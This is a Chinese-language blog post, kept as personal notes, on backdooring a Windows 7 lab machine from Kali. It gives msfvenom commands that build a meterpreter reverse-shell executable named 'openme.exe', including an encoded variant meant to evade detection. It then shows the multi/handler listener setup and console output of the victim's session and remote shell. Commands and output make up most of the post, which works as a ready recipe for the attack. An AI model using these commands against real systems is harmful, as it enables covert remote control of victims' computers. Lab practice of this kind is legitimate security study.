• Kali系列之multi/handler(渗透win7)


    环境
    靶机 192.168.137.133
    kali 192.168.137.135

    步骤+

    生成后门
    msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.137.135 LPORT=50000 -f exe -o openme.exe
    
    msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b 'x00' lhost=192.168.137.135 lport=4433 -f exe > payload.exe

    使用/multi/handler模块
    root@kali:~# msfconsole 
                                                      
    
             .                                         .
     .
    
          dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
           '   dB'                     BBP
        dB'dB'dB' dBBP     dBP     dBP BB
       dB'dB'dB' dBP      dBP     dBP  BB
      dB'dB'dB' dBBBBP   dBP     dBBBBBBB
    
                                       dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
              .                  .                  dB' dBP    dB'.BP
                                 |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                               --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                                 |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP
    
                                                                        .
                    .
            o                  To boldly go where no
                                shell has gone before
    
    
           =[ metasploit v4.16.30-dev                         ]
    + -- --=[ 1722 exploits - 986 auxiliary - 300 post        ]
    + -- --=[ 507 payloads - 40 encoders - 10 nops            ]
    + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
    
    msf > use exploit/multi/handler
    设置本地ip与端口
    msf exploit(multi/handler) > set lhost 192.168.137.135
    lhost => 192.168.137.135
    msf exploit(multi/handler) > set lport 50000
    lport => 50000
    启动后门攻击监听
    msf exploit(multi/handler) > exploit -z -j

    情况+

    当靶机点击后门程序openme.exe后,kali监听到session, 进行拿权

    msf exploit(multi/handler) > [*] Sending stage (179779 bytes) to 192.168.137.139
    [*] Meterpreter session 1 opened (192.168.137.135:50000 -> 192.168.137.139:49159) at 2018-04-13 22:18:04 +0800
    sessions 
    
    Active sessions
    ===============
    
      Id  Name  Type                     Information                         Connection
      --  ----  ----                     -----------                         ----------
      1         meterpreter x86/windows  chenglee-PCchenglee @ CHENGLEE-PC  192.168.137.135:50000 -> 192.168.137.139:49159 (192.168.137.139)
    
    msf exploit(multi/handler) > sessions -i 1
    [*] Starting interaction with 1...
    控制靶机shell
    meterpreter > shell
    Process 3028 created.
    Channel 1 created.
    Microsoft Windows [�汾 6.1.7601]
    ��Ȩ���� (c) 2009 Microsoft Corporation����������Ȩ����
    
    C:UserschengleeDesktop>ls
    

    演示

    kali

    靶机

    好东西做个分享

    D7经典脚本[multi/handler]

    做个笔记。

  • 相关阅读:
    常见寻找OEP脱壳的方法
    Windows内核原理系列01
    HDU 1025 Constructing Roads In JGShining's Kingdom
    HDU 1024 Max Sum Plus Plus
    HDU 1003 Max Sum
    HDU 1019 Least Common Multiple
    HDU 1018 Big Number
    HDU 1014 Uniform Generator
    HDU 1012 u Calculate e
    HDU 1005 Number Sequence
  • 原文地址:https://www.cnblogs.com/chenglee/p/8820406.html
Copyright © 2020-2023  润新知